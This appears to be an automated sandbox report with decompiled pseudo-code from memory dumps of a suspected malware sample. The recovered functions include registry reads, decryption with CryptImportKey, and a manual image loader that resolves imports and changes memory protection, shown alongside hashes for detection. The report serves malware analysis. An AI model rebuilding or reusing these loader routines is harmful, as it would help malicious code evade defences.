Source File: 00000001.00000002.810340952.0000000000F91000.00000020.00020000.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000001.00000002.810321795.0000000000F90000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.810445470.0000000000F99000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.810494847.0000000000F9A000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.810512763.0000000000F9C000.00000002.00020000.sdmp Download File

Similarity

API ID: FreeHeap
String ID: Ut
API String ID: 3298025750-8415677
Opcode ID: 016de40894b22ca2f6d95b8bb4843e9416bcbfffbeaa4ddd3b33d92bf752179c
Instruction ID: 4aee5c3de67abe00e46485bbe5b65f9e891e87d3559a1d25ea4c5b4028c4d87e
Opcode Fuzzy Hash: 016de40894b22ca2f6d95b8bb4843e9416bcbfffbeaa4ddd3b33d92bf752179c
Instruction Fuzzy Hash: 9BB01231008108EBCE024B10DE08F057B22B790B00F018016B3040007482730420FF15

Uniqueness

Uniqueness Score: -1.00%

Function 00F97471, Relevance: 3.1, APIs: 2, Instructions: 112
COMMON

Download Yara Rule

C-Code - Quality: 75%

			E00F97471(void* __ecx, void* _a4, intOrPtr _a8, char _a12, intOrPtr _a16, char _a20, intOrPtr _a24, intOrPtr* _a28) {
				void* _v8;
				void* __esi;
				intOrPtr* _t35;
				void* _t40;
				intOrPtr* _t41;
				intOrPtr* _t43;
				intOrPtr* _t45;
				intOrPtr* _t50;
				intOrPtr* _t52;
				void* _t54;
				intOrPtr* _t55;
				intOrPtr* _t57;
				intOrPtr* _t61;
				intOrPtr* _t65;
				intOrPtr _t68;
				void* _t72;
				void* _t75;
				void* _t76;

				_t55 = _a4;
				_t35 =  *((intOrPtr*)(_t55 + 4));
				_a4 = 0;
				_t76 =  *((intOrPtr*)( *_t35 + 0x4c))(_t35, _a16, 0,  &_v8, 0, _t72, _t75, _t54, __ecx, __ecx);
				if(_t76 < 0) {
					L18:
					return _t76;
				}
				_t40 = E00F9344C(_v8, _a8, _a12, _a20,  &_a20,  &_a12); // executed
				_t76 = _t40;
				if(_t76 >= 0) {
					_t61 = _a28;
					if(_t61 != 0 &&  *_t61 != 0) {
						_t52 = _v8;
						_t76 =  *((intOrPtr*)( *_t52 + 0x14))(_t52, _a24, 0, _t61, 0);
					}
					if(_t76 >= 0) {
						_t43 =  *_t55;
						_t68 =  *0xf9a2d0; // 0x310d5a8
						_t20 = _t68 + 0xf9b1fc; // 0x740053
						_t76 =  *((intOrPtr*)( *_t43 + 0x60))(_t43, _t20, _a16, 0, 0, _v8,  &_a4, 0);
						if(_t76 >= 0) {
							_t76 = E00F92986(_a4);
							if(_t76 >= 0) {
								_t65 = _a28;
								if(_t65 != 0 &&  *_t65 == 0) {
									_t50 = _a4;
									_t76 =  *((intOrPtr*)( *_t50 + 0x10))(_t50, _a24, 0, _t65, 0, 0);
								}
							}
						}
						_t45 = _a4;
						if(_t45 != 0) {
							 *((intOrPtr*)( *_t45 + 8))(_t45);
						}
						_t57 = __imp__#6;
						if(_a20 != 0) {
							 *_t57(_a20);
						}
						if(_a12 != 0) {
							 *_t57(_a12);
						}
					}
				}
				_t41 = _v8;
				 *((intOrPtr*)( *_t41 + 8))(_t41);
				goto L18;
			}

0x00f97477
0x00f9747a
0x00f9748a
0x00f97493
0x00f97497
0x00f97565
0x00f9756b
0x00f9756b
0x00f974b1
0x00f974b6
0x00f974ba
0x00f974c0
0x00f974c5
0x00f974cc
0x00f974db
0x00f974db
0x00f974df
0x00f974e1
0x00f974ed
0x00f974f8
0x00f97503
0x00f97507
0x00f97511
0x00f97515
0x00f97517
0x00f9751c
0x00f97523
0x00f97533
0x00f97533
0x00f9751c
0x00f97515
0x00f97535
0x00f9753a
0x00f9753f
0x00f9753f
0x00f97545
0x00f9754b
0x00f97550
0x00f97550
0x00f97555
0x00f9755a
0x00f9755a
0x00f97555
0x00f974df
0x00f9755c
0x00f97562
0x00000000

APIs

Part of subcall function 00F9344C: SysAllocString.OLEAUT32(80000002), ref: 00F934A3
Part of subcall function 00F9344C: SysFreeString.OLEAUT32(00000000), ref: 00F93508

SysFreeString.OLEAUT32(?), ref: 00F97550
SysFreeString.OLEAUT32(00F920DE), ref: 00F9755A

Memory Dump Source

Source File: 00000001.00000002.810340952.0000000000F91000.00000020.00020000.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000001.00000002.810321795.0000000000F90000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.810445470.0000000000F99000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.810494847.0000000000F9A000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.810512763.0000000000F9C000.00000002.00020000.sdmp Download File

Similarity

API ID: String$Free$Alloc
String ID:
API String ID: 986138563-0
Opcode ID: b01fedead3a8833e69eaabda1db7401b2736e21b5879e016f49abb2e1f973f55
Instruction ID: 810d17b54de8e5110cbf46d7855efb2d8dd5d8b718f4dec1298be3f0f559da04
Opcode Fuzzy Hash: b01fedead3a8833e69eaabda1db7401b2736e21b5879e016f49abb2e1f973f55
Instruction Fuzzy Hash: 9A316772900209EFCF11EF69CC88C9BBB79FBC97507194658F8159B220D632ED41EBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00F930AD, Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 41
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00F930AD(void** __esi, intOrPtr _a4, unsigned int _a8, void* _a12) {
				signed short _t18;
				void* _t24;
				signed int _t26;
				signed short _t27;

				if(_a4 != 0) {
					_t18 = E00F94BFF(_a4, _a8, _a12, __esi); // executed
					_t27 = _t18;
				} else {
					_t27 = E00F95419(0, 0x80000002, _a8, _a12,  &_a12,  &_a8);
					if(_t27 == 0) {
						_t26 = _a8 >> 1;
						if(_t26 == 0) {
							_t27 = 2;
							HeapFree( *0xf9a290, 0, _a12);
						} else {
							_t24 = _a12;
							 *(_t24 + _t26 * 2 - 2) =  *(_t24 + _t26 * 2 - 2) & _t27;
							 *__esi = _t24;
						}
					}
				}
				return _t27;
			}

0x00f930b5
0x00f9310a
0x00f9310f
0x00f930b7
0x00f930d1
0x00f930d5
0x00f930da
0x00f930dc
0x00f930ec
0x00f930f8
0x00f930de
0x00f930de
0x00f930e1
0x00f930e6
0x00f930e6
0x00f930dc
0x00f930d5
0x00f93115

APIs

Part of subcall function 00F95419: RegQueryValueExW.ADVAPI32(80000002,?,00000000,00000000,00000000,65696C43,?,00F92115,3D00F990,80000002,00F97319,00000000,00F97319,?,65696C43,80000002), ref: 00F9545B
Part of subcall function 00F95419: RegQueryValueExW.ADVAPI32(80000002,?,00000000,00000000,00000000,65696C43,65696C43,?,00F92115,3D00F990,80000002,00F97319,00000000,00F97319,?,65696C43), ref: 00F95480
Part of subcall function 00F95419: RegCloseKey.ADVAPI32(80000002,?,00F92115,3D00F990,80000002,00F97319,00000000,00F97319,?,65696C43,80000002,00000000,?), ref: 00F954B0

HeapFree.KERNEL32(00000000,?,00000000,80000002,74E5F710,?,?,74E5F710,00000000,?,00F94A79,?,004F0053,040A9338,00000000,?), ref: 00F930F8

Strings

Ut, xrefs: 00F930F8

Memory Dump Source

Source File: 00000001.00000002.810340952.0000000000F91000.00000020.00020000.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000001.00000002.810321795.0000000000F90000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.810445470.0000000000F99000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.810494847.0000000000F9A000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.810512763.0000000000F9C000.00000002.00020000.sdmp Download File

Similarity

API ID: QueryValue$CloseFreeHeap
String ID: Ut
API String ID: 2109406458-8415677
Opcode ID: f648862198fddc0b562efbec418ac4cb886954df65db90db87d9aef33b8a456c
Instruction ID: 4c002c0526aeea93f5f489062a0e8d2742964705ca730354b17390806a8cb737
Opcode Fuzzy Hash: f648862198fddc0b562efbec418ac4cb886954df65db90db87d9aef33b8a456c
Instruction Fuzzy Hash: CB013132200249FBDF22DF94CC42FAA3B76FB94760F148429FA198A171D771D961EB50

Uniqueness

Uniqueness Score: -1.00%

Function 00F941D0, Relevance: 3.0, APIs: 2, Instructions: 26
COMMON

Download Yara Rule

C-Code - Quality: 100%

			_entry_(intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _t4;
				void* _t10;
				void* _t11;
				void* _t13;

				_t13 = 1;
				_t4 = _a8;
				if(_t4 == 0) {
					if(InterlockedDecrement(0xf9a294) == 0) {
						E00F91547();
					}
				} else {
					if(_t4 == 1 && InterlockedIncrement(0xf9a294) == 1) {
						_t10 = E00F94430(_t11, _a4); // executed
						if(_t10 != 0) {
							_t13 = 0;
						}
					}
				}
				return _t13;
			}

0x00f941d7
0x00f941d8
0x00f941db
0x00f9420d
0x00f9420f
0x00f9420f
0x00f941dd
0x00f941de
0x00f941f3
0x00f941fa
0x00f941fc
0x00f941fc
0x00f941fa
0x00f941de
0x00f94217

APIs

InterlockedIncrement.KERNEL32(00F9A294), ref: 00F941E5

Part of subcall function 00F94430: HeapCreate.KERNELBASE(00000000,00400000,00000000,?,00000001), ref: 00F94445

InterlockedDecrement.KERNEL32(00F9A294), ref: 00F94205

Memory Dump Source

Source File: 00000001.00000002.810340952.0000000000F91000.00000020.00020000.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000001.00000002.810321795.0000000000F90000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.810445470.0000000000F99000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.810494847.0000000000F9A000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.810512763.0000000000F9C000.00000002.00020000.sdmp Download File

Similarity

API ID: Interlocked$CreateDecrementHeapIncrement
String ID:
API String ID: 3834848776-0
Opcode ID: 544c255bab911045d10839a399ec5b4ab359d78f649ed5a145cebc5d152bc509
Instruction ID: 368457009ed9fd3decbee89e390a84ac4aaa228835241a2770e9d16443375f8c
Opcode Fuzzy Hash: 544c255bab911045d10839a399ec5b4ab359d78f649ed5a145cebc5d152bc509
Instruction Fuzzy Hash: C8E04F3168412257BE3117789D05F9EB650BF76BA8F010028B949D10A1D664EC53FEE2

Uniqueness

Uniqueness Score: -1.00%

Function 10001C12, Relevance: 2.5, APIs: 2, Instructions: 48
memoryCOMMON

Download Yara Rule

C-Code - Quality: 83%

			E10001C12(void* __ecx) {
				void* _v8;
				char _v12;
				char* _t18;
				char* _t25;
				char* _t29;

				_t22 = __ecx;
				_push(__ecx);
				_push(__ecx);
				_t25 = 0;
				if(E10001112( &_v8,  &_v12,  *0x100041cc ^ 0x196db149) != 0) {
					if(_v8 == 0) {
						_t29 = 0;
					} else {
						_t29 = E10001BCB(_t22, _v8,  *0x100041cc ^ 0x6e49bbff);
					}
					if(_t29 != 0) {
						_v12 = E10001566(_t22) & 0x0000ffff;
						_t18 = StrStrIA(_t29,  &_v12); // executed
						if(_t18 != 0) {
							_t25 = 0x657;
						}
					}
					HeapFree( *0x10004190, 0, _v8);
				}
				return _t25;
			}

0x10001c12
0x10001c15
0x10001c16
0x10001c2c
0x10001c35
0x10001c3a
0x10001c53
0x10001c3c
0x10001c4f
0x10001c4f
0x10001c57
0x10001c61
0x10001c69
0x10001c71
0x10001c73
0x10001c73
0x10001c71
0x10001c83
0x10001c83
0x10001c8e

APIs

StrStrIA.KERNELBASE(00000000,10001810,?,10001810,?,00000000,00000000,?,?,?,10001810), ref: 10001C69
HeapFree.KERNEL32(00000000,?,?,10001810,?,00000000,00000000,?,?,?,10001810), ref: 10001C83

Memory Dump Source

Source File: 00000001.00000002.813406704.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000001.00000002.813385466.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.813421377.0000000010005000.00000040.00020000.sdmp Download File

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: 7c6dc03846e2bfa102e3b11fc6635380d306bbbb8b856f4be762ed588f39d52e
Instruction ID: 02836c98cb1f403fcd660b1e382cb1fbeaeaac2eb3635790f69eac1e8946c9bf
Opcode Fuzzy Hash: 7c6dc03846e2bfa102e3b11fc6635380d306bbbb8b856f4be762ed588f39d52e
Instruction Fuzzy Hash: 52018F76940124BBFB01CBA5CC84EDF77EDEB886C0F114162FA05E3148EA30EE009BA0

Uniqueness

Uniqueness Score: -1.00%

Function 00F94BFF, Relevance: 1.6, APIs: 1, Instructions: 50
COMMON

Download Yara Rule

C-Code - Quality: 34%

			E00F94BFF(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
				intOrPtr _v12;
				void* _v18;
				short _v20;
				intOrPtr _t15;
				short _t17;
				intOrPtr _t19;
				short _t23;

				_t23 = 0;
				_v20 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosw");
				_t15 =  *0xf9a2d0; // 0x310d5a8
				_t4 = _t15 + 0xf9b394; // 0x40a893c
				_t20 = _t4;
				_t6 = _t15 + 0xf9b124; // 0x650047
				_t17 = E00F97471(_t4, _a4, 0x80000002, _a8, _t6, _a12, _t4,  &_v20); // executed
				if(_t17 < 0) {
					_t23 = _t17;
				} else {
					if(_v20 != 8) {
						_t23 = 1;
					} else {
						_t19 = E00F94C7C(_t20, _v12);
						if(_t19 == 0) {
							_t23 = 8;
						} else {
							 *_a16 = _t19;
						}
						__imp__#6(_v12);
					}
				}
				return _t23;
			}

0x00f94c09
0x00f94c0b
0x00f94c12
0x00f94c13
0x00f94c14
0x00f94c15
0x00f94c1b
0x00f94c20
0x00f94c20
0x00f94c2a
0x00f94c3c
0x00f94c43
0x00f94c72
0x00f94c45
0x00f94c4a
0x00f94c6f
0x00f94c4c
0x00f94c4f
0x00f94c56
0x00f94c61
0x00f94c58
0x00f94c5b
0x00f94c5b
0x00f94c65
0x00f94c65
0x00f94c4a
0x00f94c79

APIs

Part of subcall function 00F97471: SysFreeString.OLEAUT32(?), ref: 00F97550

Part of subcall function 00F94C7C: lstrlenW.KERNEL32(004F0053,00000000,00000000,?,?,00F977C1,004F0053,00000000,?), ref: 00F94C85
Part of subcall function 00F94C7C: memcpy.NTDLL(00000000,004F0053,?,?,00000002,?,?,00F977C1,004F0053,00000000,?), ref: 00F94CAF
Part of subcall function 00F94C7C: memset.NTDLL ref: 00F94CC3

SysFreeString.OLEAUT32(00000000), ref: 00F94C65

Memory Dump Source

Source File: 00000001.00000002.810340952.0000000000F91000.00000020.00020000.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000001.00000002.810321795.0000000000F90000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.810445470.0000000000F99000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.810494847.0000000000F9A000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.810512763.0000000000F9C000.00000002.00020000.sdmp Download File

Similarity

API ID: FreeString$lstrlenmemcpymemset
String ID:
API String ID: 397948122-0
Opcode ID: 0f4170ed08a4052475addbf45920af331ec2c121c2c43ba69a7014c05b2666b8
Instruction ID: 51ee6c7f2cbc4d4d5a3d0141dd680636a19387fd93d7604aebea62b070173952
Opcode Fuzzy Hash: 0f4170ed08a4052475addbf45920af331ec2c121c2c43ba69a7014c05b2666b8
Instruction Fuzzy Hash: B901B132905129BFEF11AFA8CD04DAEBBB8FB58710F004515EA11E3021D370AA16E791

Uniqueness

Uniqueness Score: -1.00%

Function 00F97B76, Relevance: 1.5, APIs: 1, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00F97B76() {

				E00F97C36(0xf99364, 0xf9a154); // executed
				goto __eax;
			}

0x00f97b6d
0x00f97b74

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00F97B6D

Part of subcall function 00F97C36: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00F97CAF

Memory Dump Source

Source File: 00000001.00000002.810340952.0000000000F91000.00000020.00020000.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000001.00000002.810321795.0000000000F90000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.810445470.0000000000F99000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.810494847.0000000000F9A000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.810512763.0000000000F9C000.00000002.00020000.sdmp Download File

Similarity

API ID: ExceptionHelper2@8LoadRaise___delay
String ID:
API String ID: 123106877-0
Opcode ID: 5cd05037a9052ac8c3677c1e877ead38df8959c0378e8d2f8e6c06553096c95f
Instruction ID: f212a195a93685fcc3bc96d09b7b2030ce647c5a3354096d5c61690df3e32072
Opcode Fuzzy Hash: 5cd05037a9052ac8c3677c1e877ead38df8959c0378e8d2f8e6c06553096c95f
Instruction Fuzzy Hash: B9B012C2E7C301EC3E1C75185E0BD37110CC6C4B20330801EF000C4381D4894C493077

Uniqueness

Uniqueness Score: -1.00%

Function 00F97B5B, Relevance: 1.5, APIs: 1, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00F97B5B() {

				E00F97C36(0xf99364, 0xf9a144); // executed
				goto __eax;
			}

0x00f97b6d
0x00f97b74

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00F97B6D

Part of subcall function 00F97C36: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00F97CAF

Memory Dump Source

Source File: 00000001.00000002.810340952.0000000000F91000.00000020.00020000.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000001.00000002.810321795.0000000000F90000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.810445470.0000000000F99000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.810494847.0000000000F9A000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.810512763.0000000000F9C000.00000002.00020000.sdmp Download File

Similarity

API ID: ExceptionHelper2@8LoadRaise___delay
String ID:
API String ID: 123106877-0
Opcode ID: d9ad557bddc46f3fbfa9c15302836ab5146abf0b210ff54230fbcc513fb69fa6
Instruction ID: 7b40a45fd069a6da4acbf4528a0556dfa430007ca7480c90f24ee4b734cd3196
Opcode Fuzzy Hash: d9ad557bddc46f3fbfa9c15302836ab5146abf0b210ff54230fbcc513fb69fa6
Instruction Fuzzy Hash: 3EB09292E6C301AD3A1835185E0AC36110CC6C0B20320401AB00094181A4884D413076

Uniqueness

Uniqueness Score: -1.00%

Function 00F95C4E, Relevance: 1.5, APIs: 1, Instructions: 5
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00F95C4E(long _a4) {
				void* _t2;

				_t2 = RtlAllocateHeap( *0xf9a290, 0, _a4); // executed
				return _t2;
			}

0x00f95c5a
0x00f95c60

APIs

RtlAllocateHeap.NTDLL(00000000,00000000,00F93FAA), ref: 00F95C5A

Memory Dump Source

Source File: 00000001.00000002.810340952.0000000000F91000.00000020.00020000.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000001.00000002.810321795.0000000000F90000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.810445470.0000000000F99000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.810494847.0000000000F9A000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.810512763.0000000000F9C000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: d280e6ef71c113442c55f948848271f9dbb683dde5eaa55b229db1ec6dff2a14
Instruction ID: edb1492f59e67fa77ba7fa83fe7b6cb45e7d8ce5e2935d43eec6abcbd411d80d
Opcode Fuzzy Hash: d280e6ef71c113442c55f948848271f9dbb683dde5eaa55b229db1ec6dff2a14
Instruction Fuzzy Hash: 0BB01235408108ABDA024B10DE05F097F22B794B00F014016B30840070C2720420FB06

Uniqueness

Uniqueness Score: -1.00%

Function 10001236, Relevance: 1.3, APIs: 1, Instructions: 70
COMMON

Download Yara Rule

C-Code - Quality: 86%

			E10001236(void* __eax) {
				char _v8;
				void* _v12;
				void* __edi;
				void* _t18;
				long _t24;
				long _t26;
				long _t29;
				intOrPtr _t40;
				void* _t41;
				intOrPtr* _t42;
				void* _t44;

				_t41 = __eax;
				_t16 =  *0x100041cc;
				_t33 =  *((intOrPtr*)( *((intOrPtr*)(__eax + 0x3c)) + __eax + 0x50)) +  *0x100041cc - 0x63698bc4 &  !( *0x100041cc - 0x63698bc4);
				_t18 = E10001AA5( *((intOrPtr*)( *((intOrPtr*)(__eax + 0x3c)) + __eax + 0x50)) +  *0x100041cc - 0x63698bc4 &  !( *0x100041cc - 0x63698bc4),  *((intOrPtr*)( *((intOrPtr*)(__eax + 0x3c)) + __eax + 0x50)) +  *0x100041cc - 0x63698bc4 &  !( *0x100041cc - 0x63698bc4), _t16 + 0x9c96647d,  &_v8,  &_v12); // executed
				if(_t18 != 0) {
					_t29 = 8;
					goto L8;
				} else {
					_t40 = _v8;
					_t29 = E100014DE(_t33, _t40, _t41);
					if(_t29 == 0) {
						_t44 =  *((intOrPtr*)(_t40 + 0x3c)) + _t40;
						_t24 = E10001F31(_t40, _t44); // executed
						_t29 = _t24;
						if(_t29 == 0) {
							_t26 = E10001030(_t44, _t40); // executed
							_t29 = _t26;
							if(_t29 == 0) {
								_push(_t26);
								_push(1);
								_push(_t40);
								if( *((intOrPtr*)( *((intOrPtr*)(_t44 + 0x28)) + _t40))() == 0) {
									_t29 = GetLastError();
								}
							}
						}
					}
					_t42 = _v12;
					 *((intOrPtr*)(_t42 + 0x18))( *((intOrPtr*)(_t42 + 0x1c))( *_t42));
					E1000136A(_t42);
					L8:
					return _t29;
				}
			}

0x1000123e
0x10001240
0x1000125c
0x1000126d
0x10001274
0x100012d2
0x00000000
0x10001276
0x10001276
0x10001280
0x10001284
0x10001289
0x1000128c
0x10001291
0x10001295
0x1000129a
0x1000129f
0x100012a3
0x100012a8
0x100012a9
0x100012ad
0x100012b2
0x100012ba
0x100012ba
0x100012b2
0x100012a3
0x10001295
0x100012bc
0x100012c5
0x100012c9
0x100012d3
0x100012d9
0x100012d9

APIs

Part of subcall function 10001AA5: GetModuleHandleA.KERNEL32(?,00000020,?,?,?,?,?,10001272,?,?,?,?), ref: 10001AC9
Part of subcall function 10001AA5: GetProcAddress.KERNEL32(00000000,?), ref: 10001AEB
Part of subcall function 10001AA5: GetProcAddress.KERNEL32(00000000,?), ref: 10001B01
Part of subcall function 10001AA5: GetProcAddress.KERNEL32(00000000,?), ref: 10001B17
Part of subcall function 10001AA5: GetProcAddress.KERNEL32(00000000,?), ref: 10001B2D
Part of subcall function 10001AA5: GetProcAddress.KERNEL32(00000000,?), ref: 10001B43

Part of subcall function 100014DE: memcpy.NTDLL(?,?,?,?,?,?,?,?,10001280,?,?,?,?,?,?), ref: 1000150B
Part of subcall function 100014DE: memcpy.NTDLL(?,?,?), ref: 1000153E

Part of subcall function 10001F31: LoadLibraryA.KERNELBASE(?,?,00000000,?,?), ref: 10001F69

Part of subcall function 10001030: VirtualProtect.KERNELBASE(00000000,?,?,?), ref: 10001069
Part of subcall function 10001030: VirtualProtect.KERNELBASE(00000000,?,?,?), ref: 100010DE
Part of subcall function 10001030: GetLastError.KERNEL32 ref: 100010E4

GetLastError.KERNEL32(?,?,?,?,?), ref: 100012B4

Memory Dump Source

Source File: 00000001.00000002.813406704.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000001.00000002.813385466.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.813421377.0000000010005000.00000040.00020000.sdmp Download File

Similarity

API ID: AddressProc$ErrorLastProtectVirtualmemcpy$HandleLibraryLoadModule
String ID:
API String ID: 2673762927-0
Opcode ID: 7fb50d4abf72e62779425aba20f2cb091f3f3a1608d7f6fb80bbef81f76dc34e
Instruction ID: a454b27bac7aa40b79d56b0d65d8ec37b3ae162fcff6719093b8ab706cbc6109
Opcode Fuzzy Hash: 7fb50d4abf72e62779425aba20f2cb091f3f3a1608d7f6fb80bbef81f76dc34e
Instruction Fuzzy Hash: 9311087A6007166BE711DBA9CCC0DDB77BCEF482847054169F901D7649EBA0ED1687A0

Uniqueness

Uniqueness Score: -1.00%

Function 00F91AF1, Relevance: 1.3, APIs: 1, Instructions: 36
stringCOMMON

Download Yara Rule

C-Code - Quality: 75%

			E00F91AF1(void* __ecx, void* __edx, void* _a4, void* _a8) {
				void* _t13;
				void* _t21;

				_t11 =  &_a4;
				_t21 = 0;
				__imp__( &_a8);
				_t13 = E00F935A1( &_a4 + 1, 1, _a8, _a4, _a4, _t11); // executed
				if(_t13 == 0) {
					_t21 = E00F95C4E(_a8 + _a8);
					if(_t21 != 0) {
						E00F94502(_a4, _t21, _t23);
					}
					E00F92A03(_a4);
				}
				return _t21;
			}

0x00f91af9
0x00f91b00
0x00f91b02
0x00f91b11
0x00f91b18
0x00f91b27
0x00f91b2b
0x00f91b32
0x00f91b32
0x00f91b3a
0x00f91b3f
0x00f91b44

APIs

lstrlen.KERNEL32(00000000,00000000,00F96301,00000000,?,00F95B47,00000000,00F96301,?,00000000,00F96301,00000000,040A9630), ref: 00F91B02

Part of subcall function 00F935A1: CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000018,F0000000,00000000,00000000,00000000,?,?,?,00F91B16,00000001,00F96301,00000000), ref: 00F935D9
Part of subcall function 00F935A1: memcpy.NTDLL(00F91B16,00F96301,00000010,?,?,?,00F91B16,00000001,00F96301,00000000,?,00F95B47,00000000,00F96301,?,00000000), ref: 00F935F2
Part of subcall function 00F935A1: CryptImportKey.ADVAPI32(?,?,0000001C,00000000,00000000,00000000), ref: 00F9361B
Part of subcall function 00F935A1: CryptSetKeyParam.ADVAPI32(00000000,00000001,?,00000000), ref: 00F93633
Part of subcall function 00F935A1: memcpy.NTDLL(00000000,00000000,040A9630,00000010), ref: 00F93685

Part of subcall function 00F95C4E: RtlAllocateHeap.NTDLL(00000000,00000000,00F93FAA), ref: 00F95C5A

Memory Dump Source

Source File: 00000001.00000002.810340952.0000000000F91000.00000020.00020000.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000001.00000002.810321795.0000000000F90000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.810445470.0000000000F99000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.810494847.0000000000F9A000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.810512763.0000000000F9C000.00000002.00020000.sdmp Download File

Similarity

API ID: Crypt$memcpy$AcquireAllocateContextHeapImportParamlstrlen
String ID:
API String ID: 894908221-0
Opcode ID: 0e2a38f276b139f0d9487e752e09dc1e916a39b9aa557352bb5a3a5778fca139
Instruction ID: 11d1442b97b6bf80c269728657741ae8feff111638b5fb9a0a9f1f0d7fdfe86f
Opcode Fuzzy Hash: 0e2a38f276b139f0d9487e752e09dc1e916a39b9aa557352bb5a3a5778fca139
Instruction Fuzzy Hash: A2F05E37100109BBEF126F65DC01CEB3BAEEFC53A0B018022FD19CA110EA35DA55ABA0

Uniqueness

Uniqueness Score: -1.00%

Function 00F95872, Relevance: 1.3, APIs: 1, Instructions: 36
sleepCOMMON

Download Yara Rule

C-Code - Quality: 88%

			E00F95872(intOrPtr* __edi) {
				intOrPtr _v8;
				char _v12;
				intOrPtr _v16;
				intOrPtr _t15;
				intOrPtr* _t21;

				_t21 = __edi;
				_push( &_v12);
				_push(__edi);
				_v8 = 0x1d4c0;
				_t15 =  *((intOrPtr*)( *__edi + 0xe0))();
				while(1) {
					_v16 = _t15;
					Sleep(0x1f4); // executed
					if(_v12 == 4) {
						break;
					}
					if(_v8 == 0) {
						L4:
						_t15 =  *((intOrPtr*)( *_t21 + 0xe0))(_t21,  &_v12);
						continue;
					} else {
						if(_v8 <= 0x1f4) {
							_v16 = 0x80004004;
						} else {
							_v8 = _v8 - 0x1f4;
							goto L4;
						}
					}
					L8:
					return _v16;
				}
				goto L8;
			}

0x00f95872
0x00f9587f
0x00f95880
0x00f95881
0x00f95888
0x00f958b6
0x00f958b7
0x00f958ba
0x00f958c0
0x00000000
0x00000000
0x00f9589f
0x00f958a9
0x00f958b0
0x00000000
0x00f958a1
0x00f958a4
0x00f958c4
0x00f958a6
0x00f958a6
0x00000000
0x00f958a6
0x00f958a4
0x00f958cb
0x00f958d1
0x00f958d1
0x00000000

APIs

Sleep.KERNELBASE(000001F4), ref: 00F958BA

Memory Dump Source

Source File: 00000001.00000002.810340952.0000000000F91000.00000020.00020000.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000001.00000002.810321795.0000000000F90000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.810445470.0000000000F99000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.810494847.0000000000F9A000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.810512763.0000000000F9C000.00000002.00020000.sdmp Download File

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 0fb16ee499e8d80bc1782dd7920c835caebc24e7b6f143bc9991a77df76e3db6
Instruction ID: 159b0c6736499dcbb56de0d67475e4cbbed97e3f43c4e8b7ac68281ef934e85e
Opcode Fuzzy Hash: 0fb16ee499e8d80bc1782dd7920c835caebc24e7b6f143bc9991a77df76e3db6
Instruction Fuzzy Hash: 92F04F71C01618EFEF01DBD4C488AEDB7B8EF04705F1084AAE502A3140D3B45B84EF51

Uniqueness

Uniqueness Score: -1.00%

Function 00F945E6, Relevance: 1.3, APIs: 1, Instructions: 23
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00F945E6(void* __edx, void* __edi, void* _a4) {
				int _t7;
				int _t13;

				_t7 = E00F91896(__edx, __edi, _a4,  &_a4); // executed
				_t13 = _t7;
				if(_t13 != 0) {
					memcpy(__edi, _a4, _t13);
					 *((char*)(__edi + _t13)) = 0;
					E00F92A03(_a4);
				}
				return _t13;
			}

0x00f945f2
0x00f945f7
